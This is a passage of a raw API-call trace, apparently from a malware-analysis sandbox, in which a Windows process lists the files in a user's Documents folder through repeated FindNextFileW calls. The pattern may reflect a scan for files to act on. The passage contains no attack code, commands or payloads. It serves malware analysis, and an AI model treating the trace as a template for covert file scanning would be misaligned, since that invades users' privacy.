lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba819660, ftCreationTime.dwHighDateTime=0x1d89e40, ftLastAccessTime.dwLowDateTime=0xd2e8b550, ftLastAccessTime.dwHighDateTime=0x1d8a163, ftLastWriteTime.dwLowDateTime=0xd2e8b550, ftLastWriteTime.dwHighDateTime=0x1d8a163, nFileSizeHigh=0x0, nFileSizeLow=0x6d52, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vku7O.doc", cAlternateFileName="")) returned 1 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110ed630, ftCreationTime.dwHighDateTime=0x1d89781, ftLastAccessTime.dwLowDateTime=0x99bd1af0, ftLastAccessTime.dwHighDateTime=0x1d897bd, ftLastWriteTime.dwLowDateTime=0x99bd1af0, ftLastWriteTime.dwHighDateTime=0x1d897bd, nFileSizeHigh=0x0, nFileSizeLow=0x1573c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xC6Y6diW-2mP3g1eZ.mkv", cAlternateFileName="XC6Y6D~1.MKV")) returned 1 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9163430, ftCreationTime.dwHighDateTime=0x1d8a636, ftLastAccessTime.dwLowDateTime=0xf5dbb360, ftLastAccessTime.dwHighDateTime=0x1d8a68f, ftLastWriteTime.dwLowDateTime=0xf5dbb360, ftLastWriteTime.dwHighDateTime=0x1d8a68f, nFileSizeHigh=0x0, nFileSizeLow=0x17705, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xf-vHBag-ZJttfI79F6Z.bmp", cAlternateFileName="XF-VHB~1.BMP")) returned 1 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d2563d0, ftCreationTime.dwHighDateTime=0x1d8a3d9, ftLastAccessTime.dwLowDateTime=0xe90895f0, ftLastAccessTime.dwHighDateTime=0x1d8a58f, ftLastWriteTime.dwLowDateTime=0xe90895f0, ftLastWriteTime.dwHighDateTime=0x1d8a58f, nFileSizeHigh=0x0, nFileSizeLow=0x112d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YYyX_.avi", cAlternateFileName="")) returned 1 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf1a7000, ftCreationTime.dwHighDateTime=0x1d89d3c, ftLastAccessTime.dwLowDateTime=0xd6357f90, ftLastAccessTime.dwHighDateTime=0x1d8a4f6, ftLastWriteTime.dwLowDateTime=0xd6357f90, ftLastWriteTime.dwHighDateTime=0x1d8a4f6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZsR7Xc26_DfdmVcahH", cAlternateFileName="ZSR7XC~1")) returned 1 [0175.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0175.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0175.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x2c2d920 [0175.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0175.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0175.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82ab8 [0175.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d9fe10, ftCreationTime.dwHighDateTime=0x1d8a1d3, ftLastAccessTime.dwLowDateTime=0x5811b9f0, ftLastAccessTime.dwHighDateTime=0x1d8a25b, ftLastWriteTime.dwLowDateTime=0x5811b9f0, ftLastWriteTime.dwHighDateTime=0x1d8a25b, nFileSizeHigh=0x0, nFileSizeLow=0xd8e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_gEmDK.jpg", cAlternateFileName="")) returned 1 [0175.530] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d9fe10, ftCreationTime.dwHighDateTime=0x1d8a1d3, ftLastAccessTime.dwLowDateTime=0x5811b9f0, ftLastAccessTime.dwHighDateTime=0x1d8a25b, ftLastWriteTime.dwLowDateTime=0x5811b9f0, ftLastWriteTime.dwHighDateTime=0x1d8a25b, nFileSizeHigh=0x0, nFileSizeLow=0xd8e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_gEmDK.jpg", cAlternateFileName="")) returned 0 [0175.531] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0175.531] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0175.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.531] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0175.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0175.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.531] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.531] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.531] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.531] PathFindFileNameW (pszPath="") returned="" [0175.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f288 [0175.531] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x992af670, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x992af670, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.532] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x992af670, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x992af670, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a64d6a0, ftCreationTime.dwHighDateTime=0x1d89e2d, ftLastAccessTime.dwLowDateTime=0xa52792e0, ftLastAccessTime.dwHighDateTime=0x1d8a38d, ftLastWriteTime.dwLowDateTime=0xa52792e0, ftLastWriteTime.dwHighDateTime=0x1d8a38d, nFileSizeHigh=0x0, nFileSizeLow=0xe607, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-yzSadt_8t CRoYRKO.pptx", cAlternateFileName="-YZSAD~1.PPT")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76e020d0, ftCreationTime.dwHighDateTime=0x1d85844, ftLastAccessTime.dwLowDateTime=0xf4ab2ab0, ftLastAccessTime.dwHighDateTime=0x1d896cd, ftLastWriteTime.dwLowDateTime=0xf4ab2ab0, ftLastWriteTime.dwHighDateTime=0x1d896cd, nFileSizeHigh=0x0, nFileSizeLow=0x17c95, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1G5yOYkuiK.docx", cAlternateFileName="1G5YOY~1.DOC")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735eb110, ftCreationTime.dwHighDateTime=0x1d8343b, ftLastAccessTime.dwLowDateTime=0x9e01840, ftLastAccessTime.dwHighDateTime=0x1d86295, ftLastWriteTime.dwLowDateTime=0x9e01840, ftLastWriteTime.dwHighDateTime=0x1d86295, nFileSizeHigh=0x0, nFileSizeLow=0x93d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7q92iR26 9wIDTp.pptx", cAlternateFileName="7Q92IR~1.PPT")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dd9800, ftCreationTime.dwHighDateTime=0x1d8a2b6, ftLastAccessTime.dwLowDateTime=0xf8a326e0, ftLastAccessTime.dwHighDateTime=0x1d8a415, ftLastWriteTime.dwLowDateTime=0xf8a326e0, ftLastWriteTime.dwHighDateTime=0x1d8a415, nFileSizeHigh=0x0, nFileSizeLow=0x14afe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a1p6lyHhe5fq5DudW9XM.rtf", cAlternateFileName="A1P6LY~1.RTF")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa11bff20, ftCreationTime.dwHighDateTime=0x1d8a2b0, ftLastAccessTime.dwLowDateTime=0x44edc060, ftLastAccessTime.dwHighDateTime=0x1d8a2b2, ftLastWriteTime.dwLowDateTime=0x44edc060, ftLastWriteTime.dwHighDateTime=0x1d8a2b2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AzlD", cAlternateFileName="")) returned 1 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca04b60, ftCreationTime.dwHighDateTime=0x1d8a0eb, ftLastAccessTime.dwLowDateTime=0x70920890, ftLastAccessTime.dwHighDateTime=0x1d8a5b2, ftLastWriteTime.dwLowDateTime=0x70920890, ftLastWriteTime.dwHighDateTime=0x1d8a5b2, nFileSizeHigh=0x0, nFileSizeLow=0x9693, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BFlHqgTM.pdf", cAlternateFileName="")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8588a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d2808d0, ftCreationTime.dwHighDateTime=0x1d8a212, ftLastAccessTime.dwLowDateTime=0xfc5987a0, ftLastAccessTime.dwHighDateTime=0x1d8a4a3, ftLastWriteTime.dwLowDateTime=0xfc5987a0, ftLastWriteTime.dwHighDateTime=0x1d8a4a3, nFileSizeHigh=0x0, nFileSizeLow=0xd83e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="E ri1atxOTxxvZ19.ppt", cAlternateFileName="ERI1AT~1.PPT")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6be00ff0, ftCreationTime.dwHighDateTime=0x1d8631c, ftLastAccessTime.dwLowDateTime=0x9f5b7040, ftLastAccessTime.dwHighDateTime=0x1d89774, ftLastWriteTime.dwLowDateTime=0x9f5b7040, ftLastWriteTime.dwHighDateTime=0x1d89774, nFileSizeHigh=0x0, nFileSizeLow=0x35ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Es4lP.pptx", cAlternateFileName="ES4LP~1.PPT")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528ed6d0, ftCreationTime.dwHighDateTime=0x1d89288, ftLastAccessTime.dwLowDateTime=0xd2738d10, ftLastAccessTime.dwHighDateTime=0x1d8a68c, ftLastWriteTime.dwLowDateTime=0xd2738d10, ftLastWriteTime.dwHighDateTime=0x1d8a68c, nFileSizeHigh=0x0, nFileSizeLow=0x9f0b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HStSZLrr9ZV1_V.xlsx", cAlternateFileName="HSTSZL~1.XLS")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8828590, ftCreationTime.dwHighDateTime=0x1d8963e, ftLastAccessTime.dwLowDateTime=0xf2337830, ftLastAccessTime.dwHighDateTime=0x1d89d55, ftLastWriteTime.dwLowDateTime=0xf2337830, ftLastWriteTime.dwHighDateTime=0x1d89d55, nFileSizeHigh=0x0, nFileSizeLow=0x15ced, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iudig2j9JtQfGbCV6n.docx", cAlternateFileName="IUDIG2~1.DOC")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81177010, ftCreationTime.dwHighDateTime=0x1d8a477, ftLastAccessTime.dwLowDateTime=0x9d8c0390, ftLastAccessTime.dwHighDateTime=0x1d8a4be, ftLastWriteTime.dwLowDateTime=0x9d8c0390, ftLastWriteTime.dwHighDateTime=0x1d8a4be, nFileSizeHigh=0x0, nFileSizeLow=0x13cf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J0wAvHXNsUrjj8.docx", cAlternateFileName="J0WAVH~1.DOC")) returned 1 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82bc0 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fec8 [0175.533] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82ab8 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c9829c0, ftCreationTime.dwHighDateTime=0x1d8a07d, ftLastAccessTime.dwLowDateTime=0x893b7850, ftLastAccessTime.dwHighDateTime=0x1d8a44e, ftLastWriteTime.dwLowDateTime=0x893b7850, ftLastWriteTime.dwHighDateTime=0x1d8a44e, nFileSizeHigh=0x0, nFileSizeLow=0x159b4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nTkcVHLlB.pps", cAlternateFileName="NTKCVH~1.PPS")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43223d0, ftCreationTime.dwHighDateTime=0x1d820f9, ftLastAccessTime.dwLowDateTime=0xf4a966e0, ftLastAccessTime.dwHighDateTime=0x1d86602, ftLastWriteTime.dwLowDateTime=0xf4a966e0, ftLastWriteTime.dwHighDateTime=0x1d86602, nFileSizeHigh=0x0, nFileSizeLow=0x5a9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OkF0P0lVbo seJvjybv_.docx", cAlternateFileName="OKF0P0~1.DOC")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dfc5040, ftCreationTime.dwHighDateTime=0x1d82738, ftLastAccessTime.dwLowDateTime=0xbca0f260, ftLastAccessTime.dwHighDateTime=0x1d834e1, ftLastWriteTime.dwLowDateTime=0xbca0f260, ftLastWriteTime.dwHighDateTime=0x1d834e1, nFileSizeHigh=0x0, nFileSizeLow=0x1435e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oO9yXvHfzy447m.docx", cAlternateFileName="OO9YXV~1.DOC")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd90 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fe60 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16c) returned 0x2c40050 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff98 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c828a8 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82cc8 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70000 [0175.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82d20 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaceaf150, ftCreationTime.dwHighDateTime=0x1d86078, ftLastAccessTime.dwLowDateTime=0x828f92a0, ftLastAccessTime.dwHighDateTime=0x1d89488, ftLastWriteTime.dwLowDateTime=0x828f92a0, ftLastWriteTime.dwHighDateTime=0x1d89488, nFileSizeHigh=0x0, nFileSizeLow=0x4e59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="P1nruY.xlsx", cAlternateFileName="P1NRUY~1.XLS")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe9cc3f0, ftCreationTime.dwHighDateTime=0x1d89edc, ftLastAccessTime.dwLowDateTime=0x595ded0, ftLastAccessTime.dwHighDateTime=0x1d8a2e8, ftLastWriteTime.dwLowDateTime=0x595ded0, ftLastWriteTime.dwHighDateTime=0x1d8a2e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r92E9U.docx", cAlternateFileName="R92E9U~1.DOC")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3b99d20, ftCreationTime.dwHighDateTime=0x1d86ff6, ftLastAccessTime.dwLowDateTime=0xce3ee880, ftLastAccessTime.dwHighDateTime=0x1d87030, ftLastWriteTime.dwLowDateTime=0xce3ee880, ftLastWriteTime.dwHighDateTime=0x1d87030, nFileSizeHigh=0x0, nFileSizeLow=0xc4fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vPMkP.xlsx", cAlternateFileName="VPMKP~1.XLS")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36381180, ftCreationTime.dwHighDateTime=0x1d828b7, ftLastAccessTime.dwLowDateTime=0xbd461400, ftLastAccessTime.dwHighDateTime=0x1d82fa7, ftLastWriteTime.dwLowDateTime=0xbd461400, ftLastWriteTime.dwHighDateTime=0x1d82fa7, nFileSizeHigh=0x0, nFileSizeLow=0x7fdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xyVBcXoxWZOEVZ7.pptx", cAlternateFileName="XYVBCX~1.PPT")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2965d0, ftCreationTime.dwHighDateTime=0x1d829a0, ftLastAccessTime.dwLowDateTime=0x25121c10, ftLastAccessTime.dwHighDateTime=0x1d8a6a8, ftLastWriteTime.dwLowDateTime=0x25121c10, ftLastWriteTime.dwHighDateTime=0x1d8a6a8, nFileSizeHigh=0x0, nFileSizeLow=0x2602, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yqj5KxS1J7UVwOH.pptx", cAlternateFileName="YQJ5KX~1.PPT")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcad673b0, ftCreationTime.dwHighDateTime=0x1d8a5e7, ftLastAccessTime.dwLowDateTime=0x5195d850, ftLastAccessTime.dwHighDateTime=0x1d8a6f6, ftLastWriteTime.dwLowDateTime=0x5195d850, ftLastWriteTime.dwHighDateTime=0x1d8a6f6, nFileSizeHigh=0x0, nFileSizeLow=0x850b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YrqWFs6aPMPbYVu.doc", cAlternateFileName="YRQWFS~1.DOC")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72a382a0, ftCreationTime.dwHighDateTime=0x1d8973c, ftLastAccessTime.dwLowDateTime=0x8bbd6b30, ftLastAccessTime.dwHighDateTime=0x1d8a280, ftLastWriteTime.dwLowDateTime=0x8bbd6b30, ftLastWriteTime.dwHighDateTime=0x1d8a280, nFileSizeHigh=0x0, nFileSizeLow=0x781c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y_n6R.xlsx", cAlternateFileName="Y_N6R~1.XLS")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66aa2e60, ftCreationTime.dwHighDateTime=0x1d8823b, ftLastAccessTime.dwLowDateTime=0x97244e80, ftLastAccessTime.dwHighDateTime=0x1d8a2bc, ftLastWriteTime.dwLowDateTime=0x97244e80, ftLastWriteTime.dwHighDateTime=0x1d8a2bc, nFileSizeHigh=0x0, nFileSizeLow=0x2dc9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z6ibw SvK.xlsx", cAlternateFileName="Z6IBWS~1.XLS")) returned 1 [0175.534] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: 